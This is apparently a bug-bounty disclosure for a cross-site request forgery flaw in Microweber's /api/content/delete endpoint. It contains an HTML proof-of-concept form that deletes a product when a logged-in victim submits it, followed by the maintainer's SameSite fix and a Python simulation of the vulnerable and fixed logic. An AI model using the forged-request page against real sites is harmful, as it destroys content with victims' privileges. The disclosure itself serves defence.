Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

An attacker can delete any Product in the My shop section if they know the value of the ids[] parameter: a logged-in user who visits an attacker-controlled page is made to submit a cross-site POST to /api/content/delete, and their session cookie is sent along with it.

🕵️‍♂️ Proof of Concept

After opening PoC.html in Firefox or Safari while logged in to the site and clicking the submit button (the submission can also be automated), the Product with id 9 is deleted. Those two browsers are named because, at the time of the report, they still sent a cookie that carries no SameSite attribute with a cross-site POST; Chromium-based browsers treat such a cookie as SameSite=Lax by default and withhold it, so the same page does nothing there.

//PoC.html

<html>
<body>
<!-- Rewrite the displayed URL to "/" so the PoC page's path does not show up in history or in the Referer sent with the form -->
<script>history.pushState('', '', '/')</script>
<!-- Cross-site, top-level form POST: the victim's browser attaches their Microweber session cookie unless the cookie is SameSite=Lax or Strict -->
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<!-- &#91;&#93; decodes to [], so the field is submitted as ids[]=9, the PHP array parameter the endpoint reads -->
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

A Product with id 9 is deleted as soon as the victim clicks the submit button; any content id the attacker places in ids[] can be targeted the same way, with the victim's privileges.

📍 Location app.js#L1


We have contacted a member of the microweber team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


Hey microweber team, can you give me some feedback? Thanks so much.

amammad
4 months ago

Researcher


Hey microweber team, I just want to make sure that you see this important report too.

Peter Ivanov validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
4 months ago

Maintainer


Hello,

A fix for this issue has been applied in this commit:

https://github.com/microweber/microweber/commit/8a577f8037e9615fd20e73838a50a28696b1f7fb

Seems it's working.

Thanks for finding it out

Please send your name and a link to your profile for our "hall of fame" page.

Cheers :)

amammad
4 months ago

Researcher


I am Amammad, can you please validate the other reports too?

amammad
4 months ago

Researcher


Please set my profile address to this: https://www.huntr.dev/users/amammad

Peter Ivanov
4 months ago

Maintainer


Hello, your name has been added here https://microweber.org/list-of-contributors

We will fix the other issue and provide an update there.

Peter Ivanov confirmed that a fix has been merged on 8a577f 4 months ago
Peter Ivanov has been awarded the fix bounty
amammad
4 months ago

Researcher


With Lax the other reports are fixed now, but I reported them too because they exist in different endpoints, as the best way to fix each endpoint is to make a CSRF token for it.

Peter Ivanov
4 months ago

Maintainer


Hi, the CSRF token is not added to the api/* endpoints by design, because they are used by API clients to communicate with the site.

We check if the user is logged in and then allow API requests; you can see it in this file:
https://github.com/microweber/microweber/blob/dev/src/MicroweberPackages/App/Http/Middleware/ApiAuth.php#L23

If the user is not logged in we check for a bearerToken, and this allows API clients to communicate with the site's API.
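The two ways a request to /api/content/delete can be authenticated (a logged-in session cookie, then a bearer token, in the order the maintainer describes), together with the browser-side SameSite behaviour behind the fix commit and the PoC above, modelled end to end. This is an added example written for this page; it is not Microweber's ApiAuth middleware and not code either participant posted. The cookie name laravel_session, the attacker origin, and the session, token and product tables are constructed for the simulation; only the site origin and the ids[] field come from the PoC.

```python
"""CSRF on a cookie-or-bearer API endpoint: vulnerable vs. fixed (added example).

Simulates a browser submitting PoC.html's form to /api/content/delete against a
server that accepts either a logged-in session cookie or a bearer token. Shows
why the cookie path is forgeable, why SameSite=Lax stops the PoC, and how an
Origin check closes the same gap when a cookie is still sent cross-site.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

SITE_ORIGIN = "https://demo.microweber.org"      # host used in the PoC
ATTACKER_ORIGIN = "https://attacker.example"     # constructed: where PoC.html is hosted
SESSIONS = {"s3ss10n": "admin"}                  # constructed session store
API_TOKENS = {"tok-abc": "api-client"}           # constructed bearer tokens
PRODUCTS = {9: "T-shirt", 10: "Mug"}             # constructed content table


@dataclass
class Request:
    method: str
    headers: dict
    cookies: dict   # cookies the browser actually attached
    form: dict


def cookies_attached(jar: dict, *, cross_site: bool, method: str) -> dict:
    """Browser-side SameSite model for a top-level form submission.
    jar maps cookie name -> (value, samesite). Strict is never sent cross-site,
    Lax only on top-level GET navigations, None always. A cookie with no
    attribute is passed here as "None", which is how Firefox and Safari treated
    it at the time of the report (Chromium already defaulted to Lax)."""
    sent = {}
    for name, (value, samesite) in jar.items():
        if not cross_site or samesite == "None" or (samesite == "Lax" and method == "GET"):
            sent[name] = value
    return sent


def request_is_same_origin(req: Request) -> bool:
    """Origin header (Referer as fallback) must match the site's origin."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def authenticate(req: Request, *, origin_check: bool):
    """Session cookie first, then bearer token, as the maintainer describes.
    origin_check=True additionally rejects cookie-authenticated requests whose
    Origin is not the site, the server-side way to stop CSRF when SameSite
    cannot be relied on. Returns the principal, or None."""
    user = SESSIONS.get(req.cookies.get("laravel_session", ""))
    if user:
        return user if (request_is_same_origin(req) or not origin_check) else None
    auth = req.headers.get("Authorization", "")
    if auth.startswith("Bearer "):
        return API_TOKENS.get(auth[len("Bearer "):])   # a cross-site form cannot set this header
    return None


def delete_content(req: Request, products: dict, *, origin_check: bool) -> tuple:
    """Handler for POST /api/content/delete. Returns (status, deleted_ids)."""
    if authenticate(req, origin_check=origin_check) is None:
        return (403, [])
    ids = [int(i) for i in req.form.get("ids[]", [])]
    deleted = [i for i in ids if products.pop(i, None) is not None]
    return (200, deleted)


def run_poc(samesite: str, *, origin_check: bool) -> tuple:
    """Victim is logged in; their browser submits PoC.html's form from the attacker site."""
    products = dict(PRODUCTS)
    jar = {"laravel_session": ("s3ss10n", samesite)}
    req = Request(
        method="POST",
        headers={"Origin": ATTACKER_ORIGIN},   # browsers add Origin to cross-site POSTs
        cookies=cookies_attached(jar, cross_site=True, method="POST"),
        form={"ids[]": ["9"]},
    )
    return delete_content(req, products, origin_check=origin_check)


def run_legitimate_ui(samesite: str, *, origin_check: bool) -> tuple:
    """The same form submitted from the site's own admin page."""
    products = dict(PRODUCTS)
    jar = {"laravel_session": ("s3ss10n", samesite)}
    req = Request("POST", {"Origin": SITE_ORIGIN},
                  cookies_attached(jar, cross_site=False, method="POST"), {"ids[]": ["9"]})
    return delete_content(req, products, origin_check=origin_check)


def run_api_client() -> tuple:
    """Headless API client: no cookies, bearer token only; unaffected by either setting."""
    products = dict(PRODUCTS)
    req = Request("POST", {"Authorization": "Bearer tok-abc"}, {}, {"ids[]": ["9", "10"]})
    return delete_content(req, products, origin_check=True)


if __name__ == "__main__":
    print("no SameSite, no Origin check:", run_poc("None", origin_check=False))        # (200, [9]) vulnerable
    print("SameSite=Lax (the fix):      ", run_poc("Lax", origin_check=False))         # (403, [])
    print("no SameSite + Origin check:  ", run_poc("None", origin_check=True))         # (403, [])
    print("legitimate UI, Lax:          ", run_legitimate_ui("Lax", origin_check=True))  # (200, [9])
    print("API client:                  ", run_api_client())                           # (200, [9, 10])
```

The first run reproduces the report: the session cookie rides along with the cross-site POST and the delete succeeds. Marking the cookie SameSite=Lax is what the fix commit relies on, and it is enough for top-level POSTs, but it depends on the browser; the Origin check in authenticate is the server-side equivalent and is what a per-endpoint CSRF token would also achieve. The bearer-token path is unaffected throughout because an HTML form cannot add an Authorization header.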

amammad
4 months ago

Researcher


Yeah, the bearerToken is also good for CSRF protection, nice job.

One question... did you see the other CSRFs that I reported?